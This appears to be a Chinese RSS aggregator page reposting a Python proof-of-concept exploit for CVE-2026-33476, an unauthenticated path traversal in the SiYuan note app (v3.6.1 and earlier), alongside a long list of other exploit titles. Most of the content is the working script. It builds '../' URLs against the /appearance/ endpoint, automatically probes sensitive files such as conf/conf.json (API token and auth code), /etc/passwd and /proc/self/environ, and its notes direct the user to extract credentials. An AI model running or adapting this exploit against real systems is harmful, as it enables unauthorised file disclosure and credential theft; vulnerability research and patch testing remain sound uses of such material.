惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

F
Fox-IT International blog
Security Latest
Security Latest
S
Security @ Cisco Blogs
L
LINUX DO - 热门话题
T
Threatpost
W
WeLiveSecurity
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
腾讯CDC
雷峰网
雷峰网
Cyberwarzone
Cyberwarzone
V
V2EX - 技术
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
P
Proofpoint News Feed
T
Tailwind CSS Blog
Cisco Talos Blog
Cisco Talos Blog
人人都是产品经理
人人都是产品经理
罗磊的独立博客
P
Privacy International News Feed
The Register - Security
The Register - Security
T
Threat Research - Cisco Blogs
IT之家
IT之家
T
True Tiger Recordings
SecWiki News
SecWiki News
V
Vulnerabilities – Threatpost
博客园_首页
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
博客园 - 司徒正美
月光博客
月光博客
P
Privacy & Cybersecurity Law Blog
N
News | PayPal Newsroom
Google DeepMind News
Google DeepMind News
The Cloudflare Blog
美团技术团队
Simon Willison's Weblog
Simon Willison's Weblog
博客园 - Franky
V
Visual Studio Blog
E
Exploit-DB.com RSS Feed
酷 壳 – CoolShell
酷 壳 – CoolShell
F
Future of Privacy Forum
J
Java Code Geeks
Microsoft Azure Blog
Microsoft Azure Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Recent Commits to openclaw:main
Recent Commits to openclaw:main
C
Cisco Blogs
AWS News Blog
AWS News Blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Scott Helme
Scott Helme
D
Darknet – Hacking Tools, Hacker News & Cyber Security
I
InfoQ
U
Unit 42

CXSECURITY Database RSS Feed - CXSecurity.com

Frigate NVR 0.16.3 Remote Code Execution Linux nf_tables 6.19.3 Local Privilege Escalation ThingsBoard IoT Platform 4.2.0 Server-Side Request Forgery (SSRF) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500 / CVE-2026-46300) SUSE Manager 4.3.15 Code Execution Apache HertzBeat 1.8.0 Remote Code Execution JuzaWeb CMS 3.4.2 Authenticated Remote Code Execution NiceGUI 3.6.1 Path Traversal - CXSecurity.com GUnet OpenEclass E-learning platform < 4.2 Remote Code Execution (RCE) Windows Snipping Tool NTLMv2 Hash Hijack telnetd 2.7 Buffer Overflow - CXSecurity.com Kukurigu LPE - Linux Kernel Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Event Booking Calendar-5.0 Cross-site scripting (reflected) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Ninja Forms Uploads Unauthenticated PHP File Upload Traccar GPS Tracking System 6.11.1 Cross-Site WebSocket Hijacking (CSWSH) Erugo 0.2.14 Remote Code Execution (RCE) Linux Kernel Local Privilege Escalation via Memory Handling and Access Control Weakness Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) Linux Kernel proc_readdir_de() 6.18-rc5 Local Privilege Escalation Insecure Permissions vulnerability in Nagios Network Analyzer v.2024R1.02-64 and before allows a local attacker to escalate privileges via the remove_source.sh component. Samsung ONE Integer Overflow in CircleConst Tensor Size Calculation solaredge-CSRF-OOB-Injection - CXSecurity.com Trojan-Spy.Win32.Small / Remote Command Execution OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Throttlestop Kernel Driver Kernel Out-of-Bounds Write Privilege Escalation Critical Remote Code Execution Vulnerability in Windows Internet Key Exchange (IKE) Service (CVE-2026-33824) WordPress Madara Local File Inclusion FortiWeb 8.0.2 Remote Code Execution Easy File Sharing Web Server v7.2 Buffer Overflow NetBT e-Fatura Privilege Escalation Docker Desktop 4.44.3 Unauthenticated API Exposure MaNGOSWebV4 4.0.6 Reflected XSS Grafana 11.6.0 SSRF OctoPrint 1.11.2 File Upload esm-dev 136 Path Traversal Linux Kernel mseal Invariant Violation (Linux kernel 6.17-7.0 rc5) astrojs/vercel < = 10.0.0 - Unauthenticated x-astro-path Header Path Override Microsoft SQL Server Privilege Elevation Through FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass Wavlink WL-WN579X3-C firewall.cgi UPNP Stack-based Buffer Overflow esiclivre 0.2.2 SQL Injection - CXSecurity.com Payara Server Cross Site Scripting esiclivre 0.2.2 SQL Injection Tenda AC21 V1.0 V16.03.08.16 - Stack Buffer Overflow in SetNetControlList WWBN AVideo < = 26.0 - Authenticated SQL Injection Windows RRAS Remote Code Execution Vulnerability (CVE-2026-26111) - SE-RCE Exploit Linux Kernel 5.8 < 5.15.25 - Local Privilege Escalation Exploit Discourse < = 2026.2.1 Authenticated Missing Authorization Kanboard < = 1.2.50 Authenticated SQL Injection Glances < = 4.5.2 OS Command Injection via Mustache Template Fields LB-LINK BL-WR9000 V2.4.9 - Stack-based Buffer Overflow in /goform/get_hidessid_cfg LB-LINK BL-WR9000 V2.4.9 - Unauthenticated / Post-Auth Stack-based Buffer Overflow zumba/json-serializer zumba/json-serializer < 3.2.3 RCE Wekan 8.31.0 - 8.33Meteor DDP notificationUsers Sensitive Data Leak Splunk Remote Command Execution via Improper Input Validation Microsoft Windows MSHTML Security Feature Bypass Vulnerability Qualcomm GPU Driver Memory Corruption Vulnerability in Android Devices Frappe Framework <14.99.0 and <15.84.0 Unauthenticated SQL Injection PyJWT < 2.12.0 crit header bypass / Insufficient crit validation PluckCMS 4.7.10 Unrestricted File Upload Python-Multipart < 0.0.22 - Path Traversal / Arbitrary File Write (CVE-2026-24486) WeGIA < = 3.6.4 Unauthenticated Admin Authentication Bypass NocoDB < = 0.301.2 User Enumeration via Password Reset Endpoint Craft CMS 4.x & 5.x RCE via Blocklist Bypass pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3 JwtAuthenticator Authentication Bypass via JWE-wrapped PlainJWT AirPlay Dual‑Mode Discovery Scanner for Flipper Zero ESP32 WiFi Dev Board WeGIA < = 3.6.4 Remote Code Execution via OS Command Injection WordPress Backup Migration 1.3.7 Remote Command Execution WeGIA 3.5.0 SQL Injection
SiYuan <= v3.6.1 Note unauthenticated arbitrary file read (path traversal)
2026-03-26 · via CXSECURITY Database RSS Feed - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: SiYuan <= v3.6.1 Note unauthenticated arbitrary file read (path traversal) # CVE: CVE-2026-33476 # Date: 2026-03-21 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://b3log.org/siyuan # Software Link: https://github.com/siyuan-note/siyuan # Affected: SiYuan <= v3.6.1 # Tested on: SiYuan v3.6.1 (docker / linux) # Category: Webapps # Platform: Linux / Windows / macOS # Exploit Type: Remote File Disclosure # CVSS: 7.5 # CWE: CWE-22, CWE-73 # Description: Unauthenticated path traversal in /appearance/* endpoint allows reading arbitrary files # Fixed in: v3.6.2 # Usage: # python3 exploit.py <target_url> --target-file <path> # python3 exploit.py http://127.0.0.1:6806 --auto # # Examples: # python3 exploit.py http://target:6806 --target-file conf/conf.json # python3 exploit.py http://target:6806 -f ../../../../etc/passwd --depth 10 # # Options: # --target-file Specific file path to attempt to read # --depth Traversal depth (default: 6) # --auto Try multiple common sensitive paths automatically # --timeout Request timeout in seconds (default: 12) # # Notes: # Most useful target: conf/conf.json (contains API token, access auth code, etc.) # Use --auto mode for broad testing of interesting files # # How to Use # Step 1: Run the script against a vulnerable SiYuan instance # Step 2: Use --target-file conf/conf.json to extract credentials/config # Step 3: For system file access try deeper traversal (--depth 8–12) print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-33476 • SiYuan arbitrary file read ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import argparse import urllib.parse import requests import sys def build_traversal_url(base_url, target_file, levels=5): traversal = "../" * levels target_file = target_file.lstrip("/.").replace("\\", "/") path = f"{traversal}{target_file}" return urllib.parse.urljoin(base_url.rstrip("/") + "/", f"appearance/{path}") def try_read_file(session, url, timeout=10): try: r = session.get(url, timeout=timeout, allow_redirects=False) if r.status_code == 200 and len(r.content) > 0: try: return r.text[:4096] except UnicodeDecodeError: return f"[Binary content - {len(r.content)} bytes]" elif r.status_code in (401, 403): return None else: return f"[Status {r.status_code}] {r.reason}" except requests.RequestException as e: return f"[Error] {str(e)}" def auto_exploit(base_url, max_levels=10): common_targets = [ "conf/conf.json", "data/conf.json", "workspace/conf.json", "data/emojis/README.md", ".siyuan/history.db", "appearance/themes/README.md", "etc/passwd", "proc/self/environ", "Windows/win.ini", "Users/Public/Desktop/test.txt", ] print("[*] Starting automatic traversal test...\n") s = requests.Session() s.headers["User-Agent"] = "Mozilla/5.0 (compatible; SiYuan-PoC/1.0)" for target in common_targets: print(f"→ Target: {target}") found = False for depth in range(3, max_levels + 1): exploit_url = build_traversal_url(base_url, target, depth) result = try_read_file(s, exploit_url) if result is None: continue if "[Error]" not in result and "Status" not in result: print(f" SUCCESS at depth {depth}:") print(f" URL: {exploit_url}") print(f" Content preview:\n{result.rstrip()}\n") found = True break if not found: print(" Not found in tested depths.\n") def main(): parser = argparse.ArgumentParser(description="CVE-2026-33476 SiYuan path traversal PoC") parser.add_argument("url", help="Base URL of SiYuan instance") parser.add_argument("--target-file", "-f", help="Specific file to read") parser.add_argument("--depth", "-d", type=int, default=6, help="Traversal depth") parser.add_argument("--auto", action="store_true", help="Try common files automatically") parser.add_argument("--timeout", type=int, default=12, help="Request timeout") args = parser.parse_args() base = args.url.rstrip("/") if not base.startswith(("http://", "https://")): print("[!] URL must start with http:// or https://") sys.exit(1) print(f"[*] Targeting SiYuan instance: {base}") print("[*] CVE-2026-33476 - Unauthenticated Arbitrary File Read PoC\n") s = requests.Session() s.headers.update({"User-Agent": "Mozilla/5.0 SiYuan-Test/1.0"}) if args.auto: auto_exploit(base, args.depth) elif args.target_file: url = build_traversal_url(base, args.target_file, args.depth) print(f"[*] Attempting to read: {args.target_file}") print(f" URL: {url}\n") content = try_read_file(s, url, args.timeout) if content: print("Result:\n" + "-"*60) print(content) if len(content) > 4000: print("\n... [truncated - full content retrieved]") else: print("[×] Failed - no content or blocked (possibly patched?)") else: parser.print_help() print("\n[!] Please provide --target-file or use --auto mode.") sys.exit(1) if __name__ == "__main__": main()

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。